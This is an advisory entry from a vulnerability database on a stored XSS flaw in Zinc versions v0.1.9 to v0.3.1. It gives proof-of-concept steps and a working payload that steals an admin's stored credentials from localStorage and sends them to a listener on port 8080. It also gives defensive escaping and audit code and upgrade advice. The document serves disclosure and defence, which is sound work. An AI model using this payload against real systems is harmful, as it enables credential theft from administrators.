Mend Vulnerability Database
Date: October 6, 2022
PoC Details
1. Log in to the application as a user and create a new template.
2. Enter the XSS payload provided in the PoC section below in the template name field, fill in the other fields, and save the template.
3. Start a listener on port 8080 to receive the victim's credentials.
4. Now log in as an admin user and navigate to the created template.
5. Under the actions tab, click on the delete button.
"><img src=x onerror=this.a=window.location.href.slice(0,7);this.src=this.a+'127.0.0.1:8080'+this.a+'x='+localStorage.getItem("creds")>
Affected Environments
Zinc versions v0.1.9 through v0.3.1

Prevention
Upgrade to zinc version v0.3.2
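
The leading `">` in the PoC string suggests the template name is written into a quoted HTML attribute without encoding. The following is an added example, not Zinc's code: it encodes the name before it reaches markup and audits stored names for entries saved before the upgrade. The function names, the markup and the sample names are assumptions.

```javascript
// Added illustration: hypothetical helpers, not taken from the Zinc code base.

// Characters that can close an attribute value or open a new tag.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};

// Encode a value for use in element text or a quoted attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hypothetical delete-confirmation markup: the name appears in an attribute
// and in element text, and both sinks receive the encoded value.
function renderDeleteConfirm(templateName) {
  const safe = escapeHtml(templateName);
  return `<button title="Delete ${safe}">Delete</button>` +
         `<p>Delete template ${safe}?</p>`;
}

// Audit helper: return stored names that contain markup metacharacters or an
// inline event-handler attribute, so they can be reviewed and cleaned up.
function auditTemplateNames(names) {
  return names.filter(
    (name) => /[<>"'`]/.test(name) || /\bon\w+\s*=/i.test(name)
  );
}

// Constructed sample data. The last entry has the same shape as the PoC
// string (attribute break-out, then a tag with an event handler) but calls a
// harmless placeholder function.
const storedNames = [
  'logs-2022',
  'nginx_access',
  '"><img src=x onerror=noop()>',
];

const flagged = auditTemplateNames(storedNames);
console.log('names needing review:', flagged);
console.log(renderDeleteConfirm(storedNames[2]));
```

Encoding at the sink keeps the name as inert text even if a malicious value is already stored; the audit finds such values so they can be removed.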
Good to know:
|Metric|Value|
|---|---|
|Attack Vector (AV):|Network|
|Attack Complexity (AC):|Low|
|Privileges Required (PR):|Low|
|User Interaction (UI):|Required|